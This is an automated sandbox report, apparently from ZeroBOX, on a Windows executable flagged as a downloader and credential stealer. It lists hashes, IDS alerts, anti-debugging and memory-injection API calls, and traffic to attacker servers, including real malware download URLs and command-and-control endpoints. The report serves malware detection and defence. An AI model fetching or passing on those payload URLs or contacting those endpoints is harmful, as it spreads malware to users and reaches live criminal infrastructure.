popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

AppGate2103v01.exe

Emotet North Korea Generic Malware .NET framework(MSIL) Malicious Library Downloader UPX Malicious Packer Admin Tool (Sysinternals etc ...) Code injection ScreenShot DNS Anti_VM Steal credential Socket AntiDebug PE64 PE File PE32 AntiVM
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us June 3, 2024, 9:34 a.m. June 3, 2024, 9:36 a.m.
Size 3.3MB
Type PE32+ executable (GUI) x86-64, for MS Windows
MD5 9905d4c0f3aaf44c8f7a0f6c4b4d3543
SHA256 2d8524c8b31583d8237455c7211f486667d4cd9ae7db7ac4bab3cbde6b9a5e7b
CRC32 BB575206
ssdeep 98304:HETDbLgHBfCrX0TvTtJOPsRsT90DV8OrLz:CjgHNCgLT7OEsTaDV7r
Yara
  • IsPE64 - (no description)
  • PE_Header_Zero - PE File Signature
  • UPX_Zero - UPX packed file

Name Response Post-Analysis Lookup
f.123654987.xyz
vk.com
A 87.240.129.133
A 87.240.132.72
A 87.240.132.67
A 87.240.137.164
A 93.186.225.194
A 87.240.132.78
87.240.132.72
lop.foxesjoy.com
A 172.67.159.232
A 104.21.66.124
104.21.66.124
apps.identrust.com
A 61.111.58.16
CNAME a1952.dscq.akamai.net
CNAME identrust.edgesuite.net
A 61.111.58.34
23.210.247.57
ipinfo.io
A 34.117.186.192
34.117.186.192
monoblocked.com
A 45.130.41.108
45.130.41.108
api.myip.com
A 172.67.75.163
A 104.26.9.59
A 104.26.8.59
104.26.9.59
db-ip.com
A 104.26.5.15
A 104.26.4.15
A 172.67.75.166
172.67.75.166
api64.ipify.org
A 173.231.16.77
A 104.237.62.213
104.237.62.213
IP Address Status Action
149.88.76.85 Active Moloch
176.111.174.109 Active Moloch
104.237.62.213 Active Moloch
104.26.4.15 Active Moloch
104.26.9.59 Active Moloch
147.45.47.149 Active Moloch
164.124.101.2 Active Moloch
172.67.159.232 Active Moloch
185.172.128.159 Active Moloch
185.172.128.69 Active Moloch
34.117.186.192 Active Moloch
45.130.41.108 Active Moloch
5.42.66.10 Active Moloch
5.42.99.177 Active Moloch
61.111.58.34 Active Moloch
87.240.132.67 Active Moloch
91.202.233.232 Active Moloch
94.232.45.38 Active Moloch
5.42.65.116 Active Moloch

Suricata Alerts

Flow SID Signature Category
UDP 192.168.56.103:64894 -> 164.124.101.2:53 2047702 ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup Misc activity
TCP 192.168.56.103:49164 -> 104.26.9.59:443 2042969 ET INFO Observed External IP Lookup Domain in TLS SNI (api .myip .com) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49164 -> 104.26.9.59:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49180 -> 172.67.159.232:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49168 -> 34.117.186.192:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49168 -> 34.117.186.192:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49168 -> 34.117.186.192:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49166 -> 104.237.62.213:443 2047703 ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI Misc activity
TCP 192.168.56.103:49166 -> 104.237.62.213:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49166 -> 104.237.62.213:443 2047703 ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI Misc activity
TCP 104.237.62.213:443 -> 192.168.56.103:49167 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 5.42.66.10:80 -> 192.168.56.103:49172 2400000 ET DROP Spamhaus DROP Listed Traffic Inbound group 1 Misc Attack
TCP 172.67.159.232:80 -> 192.168.56.103:49180 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 91.202.233.232:80 -> 192.168.56.103:49175 2400013 ET DROP Spamhaus DROP Listed Traffic Inbound group 14 Misc Attack
TCP 147.45.47.149:80 -> 192.168.56.103:49178 2400022 ET DROP Spamhaus DROP Listed Traffic Inbound group 23 Misc Attack
TCP 192.168.56.103:49170 -> 104.26.4.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 176.111.174.109:80 -> 192.168.56.103:49179 2400029 ET DROP Spamhaus DROP Listed Traffic Inbound group 30 Misc Attack
TCP 176.111.174.109:80 -> 192.168.56.103:49179 2402000 ET DROP Dshield Block Listed Source group 1 Misc Attack
TCP 192.168.56.103:49175 -> 91.202.233.232:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49184 -> 172.67.159.232:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49176 -> 94.232.45.38:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 172.67.159.232:80 -> 192.168.56.103:49184 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49176 -> 94.232.45.38:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 185.172.128.69:80 -> 192.168.56.103:49173 2014819 ET INFO Packed Executable Download Misc activity
TCP 172.67.159.232:80 -> 192.168.56.103:49185 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49182 -> 87.240.132.67:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49182 -> 87.240.132.67:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49190 -> 172.67.159.232:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49174 -> 5.42.66.10:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49175 -> 91.202.233.232:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 94.232.45.38:80 -> 192.168.56.103:49176 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 5.42.66.10:80 -> 192.168.56.103:49172 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 94.232.45.38:80 -> 192.168.56.103:49176 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 5.42.66.10:80 -> 192.168.56.103:49172 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 185.172.128.69:80 -> 192.168.56.103:49173 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 176.111.174.109:80 -> 192.168.56.103:49179 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 5.42.66.10:80 -> 192.168.56.103:49172 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 185.172.128.69:80 -> 192.168.56.103:49173 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 176.111.174.109:80 -> 192.168.56.103:49179 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 185.172.128.69:80 -> 192.168.56.103:49173 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 176.111.174.109:80 -> 192.168.56.103:49179 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 185.172.128.159:80 -> 192.168.56.103:49177 2014819 ET INFO Packed Executable Download Misc activity
TCP 192.168.56.103:49181 -> 45.130.41.108:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 45.130.41.108:80 -> 192.168.56.103:49181 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 94.232.45.38:80 -> 192.168.56.103:49176 2015744 ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) Misc activity
TCP 91.202.233.232:80 -> 192.168.56.103:49175 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 91.202.233.232:80 -> 192.168.56.103:49175 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49191 -> 45.130.41.108:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 185.172.128.159:80 -> 192.168.56.103:49177 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.172.128.159:80 -> 192.168.56.103:49177 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 185.172.128.159:80 -> 192.168.56.103:49177 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 192.168.56.103:49188 -> 87.240.132.67:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49188 -> 87.240.132.67:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49183 -> 87.240.132.67:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49183 -> 87.240.132.67:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49189 -> 87.240.132.67:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49189 -> 87.240.132.67:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49200 -> 87.240.132.67:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49200 -> 87.240.132.67:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49197 -> 87.240.132.67:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49197 -> 87.240.132.67:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49186 -> 45.130.41.108:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 45.130.41.108:80 -> 192.168.56.103:49186 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49198 -> 45.130.41.108:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49194 -> 147.45.47.149:54674 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 147.45.47.149:54674 -> 192.168.56.103:49194 2014819 ET INFO Packed Executable Download Misc activity
TCP 147.45.47.149:54674 -> 192.168.56.103:49194 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 147.45.47.149:54674 -> 192.168.56.103:49194 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49192 -> 87.240.132.67:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49193 -> 87.240.132.67:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 5.42.66.10:80 -> 192.168.56.103:49174 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 5.42.66.10:80 -> 192.168.56.103:49174 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 5.42.66.10:80 -> 192.168.56.103:49174 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 192.168.56.103:49199 -> 87.240.132.67:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49201 -> 87.240.132.67:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49201 -> 87.240.132.67:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49203 -> 87.240.132.67:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49203 -> 87.240.132.67:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49202 -> 87.240.132.67:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49205 -> 87.240.132.67:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49209 -> 87.240.132.67:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49209 -> 87.240.132.67:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49210 -> 87.240.132.67:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49213 -> 87.240.132.67:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49214 -> 87.240.132.67:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49214 -> 87.240.132.67:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49217 -> 87.240.132.67:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49218 -> 5.42.66.10:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 5.42.66.10:80 -> 192.168.56.103:49218 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 5.42.66.10:80 -> 192.168.56.103:49218 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49222 -> 87.240.132.67:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 5.42.66.10:80 -> 192.168.56.103:49220 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 5.42.66.10:80 -> 192.168.56.103:49220 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 5.42.66.10:80 -> 192.168.56.103:49220 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 192.168.56.103:49219 -> 87.240.132.67:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 87.240.132.67:80 -> 192.168.56.103:49206 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49211 -> 87.240.132.67:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49211 -> 87.240.132.67:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49212 -> 87.240.132.67:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49216 -> 87.240.132.67:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49216 -> 87.240.132.67:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49166 -> 104.237.62.213:443 2047703 ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI Misc activity

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.103:49164
104.26.9.59:443 		C=US, O=Let's Encrypt, CN=R3 CN=myip.com 87:d2:90:92:b6:6a:56:3c:25:f1:ae:56:52:d9:2b:ac:16:44:bb:bc
TLSv1
192.168.56.103:49170
104.26.4.15:443 		C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 CN=db-ip.com 1f:af:15:cd:f8:f8:ee:30:f9:6e:6e:54:bc:9a:a7:c7:77:70:6d:25
TLSv1
192.168.56.103:49190
172.67.159.232:443 		C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 CN=foxesjoy.com 98:61:17:75:9f:9b:34:ec:5e:dd:5b:36:49:5e:1b:7d:2d:22:18:22
TLSv1
192.168.56.103:49198
45.130.41.108:443 		C=US, O=Let's Encrypt, CN=R3 CN=monoblocked.com 2c:d3:99:84:08:33:38:25:31:da:34:23:da:07:ec:a6:6f:e6:0a:ac
TLSv1
192.168.56.103:49199
87.240.132.67:443 		C=BE, O=GlobalSign nv-sa, CN=GlobalSign ECC OV SSL CA 2018 C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com 65:c4:6f:80:24:02:e8:bf:a9:67:89:c3:4c:f8:46:77:d0:3b:df:fd
TLSv1
192.168.56.103:49205
87.240.132.67:443 		C=BE, O=GlobalSign nv-sa, CN=GlobalSign ECC OV SSL CA 2018 C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com 65:c4:6f:80:24:02:e8:bf:a9:67:89:c3:4c:f8:46:77:d0:3b:df:fd
TLSv1
192.168.56.103:49210
87.240.132.67:443 		C=BE, O=GlobalSign nv-sa, CN=GlobalSign ECC OV SSL CA 2018 C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com 65:c4:6f:80:24:02:e8:bf:a9:67:89:c3:4c:f8:46:77:d0:3b:df:fd
TLSv1
192.168.56.103:49213
87.240.132.67:443 		C=BE, O=GlobalSign nv-sa, CN=GlobalSign ECC OV SSL CA 2018 C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com 65:c4:6f:80:24:02:e8:bf:a9:67:89:c3:4c:f8:46:77:d0:3b:df:fd
TLSv1
192.168.56.103:49217
87.240.132.67:443 		C=BE, O=GlobalSign nv-sa, CN=GlobalSign ECC OV SSL CA 2018 C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com 65:c4:6f:80:24:02:e8:bf:a9:67:89:c3:4c:f8:46:77:d0:3b:df:fd
TLSv1
192.168.56.103:49222
87.240.132.67:443 		C=BE, O=GlobalSign nv-sa, CN=GlobalSign ECC OV SSL CA 2018 C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com 65:c4:6f:80:24:02:e8:bf:a9:67:89:c3:4c:f8:46:77:d0:3b:df:fd

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
section _RDATA
section .vmpx\xc2\xbd\xc2
resource name UIFILE
resource name None
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x73f11194
LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x73de2ba1
mscorlib+0xb3ce2e @ 0x730fce2e
mscorlib+0xb3c71a @ 0x730fc71a
mscorlib+0xb3ae13 @ 0x730fae13
0xdebb8d
0xdeb873
0xdedef1
0xdeb0ed
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73d62652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73d7264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x73de1838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x73de1737
mscorlib+0x2d3711 @ 0x72893711
mscorlib+0x308f2d @ 0x728c8f2d
mscorlib+0x2cb060 @ 0x7288b060
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73d62652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73d7264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x73de1838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x73de1737
mscorlib+0x2d36ad @ 0x728936ad
mscorlib+0x308f2d @ 0x728c8f2d
mscorlib+0x2cb060 @ 0x7288b060
microsoft+0x1069af @ 0x714b69af
microsoft+0x10261c @ 0x714b261c
microsoft+0x14b2d0 @ 0x714fb2d0
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73d62652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73d7264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x73de1838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x73de1737
mscorlib+0x2d36ad @ 0x728936ad
mscorlib+0x308f2d @ 0x728c8f2d
mscorlib+0x3135ed @ 0x728d35ed
mscorlib+0x9873b1 @ 0x72f473b1
0xde750a
0xdea1e6
0xb32634
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73d62652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73d7264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73d72e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x73e274ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73e27610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73eb1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73eb1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73eb1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x73eb416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7469f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74797f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74794de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xe0434f4e
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 3655312
registers.edi: 0
registers.eax: 3655312
registers.ebp: 3655392
registers.edx: 0
registers.ebx: 5160288
registers.esi: 4809512
registers.ecx: 2212295062
1 0 0
suspicious_features Connection to IP address suspicious_request GET http://5.42.99.177/api/crazyfish.php
suspicious_features POST method with no referer header, Connection to IP address suspicious_request POST http://5.42.99.177/api/twofish.php
suspicious_features Connection to IP address suspicious_request HEAD http://185.172.128.69/download.php?pub=inte
suspicious_features Connection to IP address suspicious_request HEAD http://5.42.66.10/download/th/getimage12.php
suspicious_features Connection to IP address suspicious_request HEAD http://5.42.66.10/download/th/retail.php
suspicious_features Connection to IP address suspicious_request HEAD http://91.202.233.232/o2i3jroi23joj23ikrjokij3oroi.exe
suspicious_features Connection to IP address suspicious_request HEAD http://94.232.45.38/eee01/eee01.exe
suspicious_features Connection to IP address suspicious_request HEAD http://185.172.128.159/dl.php
suspicious_features Connection to IP address suspicious_request HEAD http://176.111.174.109/google
suspicious_features Connection to IP address suspicious_request GET http://176.111.174.109/google
suspicious_features Connection to IP address suspicious_request GET http://91.202.233.232/o2i3jroi23joj23ikrjokij3oroi.exe
suspicious_features Connection to IP address suspicious_request GET http://185.172.128.69/download.php?pub=inte
suspicious_features Connection to IP address suspicious_request GET http://185.172.128.159/dl.php
suspicious_features Connection to IP address suspicious_request GET http://94.232.45.38/eee01/eee01.exe
suspicious_features Connection to IP address suspicious_request GET http://5.42.66.10/download/th/getimage12.php
suspicious_features Connection to IP address suspicious_request HEAD http://5.42.66.10/download/123p.exe
suspicious_features Connection to IP address suspicious_request HEAD http://5.42.66.10/download/th/space.php
suspicious_features Connection to IP address suspicious_request GET http://5.42.66.10/download/th/retail.php
suspicious_features Connection to IP address suspicious_request GET http://5.42.66.10/download/123p.exe
suspicious_features Connection to IP address suspicious_request GET http://5.42.66.10/download/th/space.php
request GET http://5.42.99.177/api/crazyfish.php
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
request POST http://5.42.99.177/api/twofish.php
request HEAD http://185.172.128.69/download.php?pub=inte
request HEAD http://5.42.66.10/download/th/getimage12.php
request HEAD http://5.42.66.10/download/th/retail.php
request HEAD http://91.202.233.232/o2i3jroi23joj23ikrjokij3oroi.exe
request HEAD http://94.232.45.38/eee01/eee01.exe
request HEAD http://185.172.128.159/dl.php
request HEAD http://176.111.174.109/google
request GET http://176.111.174.109/google
request GET http://91.202.233.232/o2i3jroi23joj23ikrjokij3oroi.exe
request GET http://185.172.128.69/download.php?pub=inte
request GET http://185.172.128.159/dl.php
request GET http://94.232.45.38/eee01/eee01.exe
request GET http://5.42.66.10/download/th/getimage12.php
request HEAD http://5.42.66.10/download/123p.exe
request HEAD http://5.42.66.10/download/th/space.php
request GET http://5.42.66.10/download/th/retail.php
request GET http://5.42.66.10/download/123p.exe
request GET http://5.42.66.10/download/th/space.php
request GET https://db-ip.com/demo/home.php?s=
request GET https://lop.foxesjoy.com/ssl/crt.exe
request GET https://monoblocked.com/525403/setup.exe
request POST http://5.42.99.177/api/twofish.php
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2816
region_size: 1900544
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00720000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x008b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2816
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73d61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2816
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73d62000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2816
region_size: 458752
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00570000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00412000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00445000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0044b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00447000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2816
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
